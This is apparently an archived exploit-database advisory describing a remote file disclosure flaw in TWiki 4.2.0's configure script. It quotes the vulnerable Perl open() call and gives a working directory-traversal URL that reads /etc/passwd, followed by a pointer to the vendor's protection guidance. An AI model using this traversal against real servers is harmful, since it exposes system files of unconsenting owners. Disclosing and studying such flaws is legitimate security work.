Lucene search
+L

TWiki 4.2.0 - 'configure' Remote File Disclosure

🗓️ 19 Aug 2008 00:00:00Reported by Th1nk3rType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 73 Views

TWiki 4.2.0 File Disclosure Vuln (configure) - Input Validation Error, Remote File Disclosure in "/bin/configure" script, allowing viewing of arbitrary files

Related
Code
ReporterTitlePublishedViews
Family
zdt
zdt
TWiki <= 4.2.2 (action) Remote Code Execution Vulnerability
21 Sep 200800:00
zdt
freebsd
FreeBSD
twiki -- Arbitrary code execution in session files
5 Aug 200800:00
freebsd
circl
Circl
CVE-2008-3195
19 Aug 200800:00
circl
circl
Circl
CVE-2008-4112
19 Aug 200800:00
circl
cve
CVE
CVE-2008-3195
17 Sep 200818:06
cve
cve
CVE
CVE-2008-4112
16 Sep 200823:00
cve
cvelist
Cvelist
CVE-2008-3195
17 Sep 200818:06
cvelist
cvelist
Cvelist
CVE-2008-4112
16 Sep 200823:00
cvelist
debian
Debian
[SECURITY] [DSA 1639-1] New twiki packages execution of arbitrary code
19 Sep 200819:25
debian
nessus
Tenable Nessus
Debian DSA-1639-1 : twiki - command execution
22 Sep 200800:00
nessus
Rows per page
################################################################################################################
#                                                                                                              #
#                                 TWiki 4.2.0 File Disclosure Vuln (configure)                                 #
#                                                                                                              #
################################################################################################################

	"We're brazilian newbies!!! :p" - Th1nk3r

Info
----------------------------------------------------------------------------------------------------------------
Classe    :  Input Validation Error
Remote    :  Yes
Local     :  No
Date      :  05/08/2008
Credits   :  Th1nk3r  (cnwfhguohrugbo / gmail.com)
Greetz    :  w4n73d h4ck3r, Vitor, Vonnatur, FuradordeSyS, B470-Killer, M4v3rick.

Description
----------------------------------------------------------------------------------------------------------------
	TWiki version 4.2.0 (I haven't tested other versions) is vulnerable to a File Disclosure. It's only possible
to exploit the bug if you can access the "/bin/configure" script.
Otherwise, you can not exploit this bug.
	Vulnerable code of "/bin/configure" script:

	if( $action eq 'image' ) {
    		# SMELL: this call is correct, but causes a perl error
    		# on some versions of CGI.pm
    		# print $query->header(-type => $query->param('type'));
    		# So use this instead:
    		print 'Content-type: '.$query->param('type')."\n\n";
    	if( open(F, 'logos/'.$query->param('image' ))) {
        	local $/ = undef;
        	print <F>;
        	close(F);
    	}
    	exit 0;
}

	The bug is in the open() function. The file is set by visitor, and there is no protection added
by the programmer.
	Note that "$query->param('type')" can be set by the visitor. Therefore, you'll set it to "text/plain".



Exploit
----------------------------------------------------------------------------------------------------------------

	To exploit the bug, you just need set the "image" variable to the path of file you wish to view.
	The file will be revealed if you have permission to view it.

	By example, to show the "/etc/passwd" file content, go to :
	http://www.examplo.org/{PATH}/bin/configure?action=image;image=../../../../../../etc/passwd;type=text/plain



Solution
----------------------------------------------------------------------------------------------------------------
	Read "http://twiki.org/cgi-bin/view/TWiki/TWikiInstallationGuide", Basic Installation, topic 8, for
more information of how to protect your "configure" script.

# milw0rm.com [2008-08-19]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Aug 2008 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.8
EPSS0.0828
73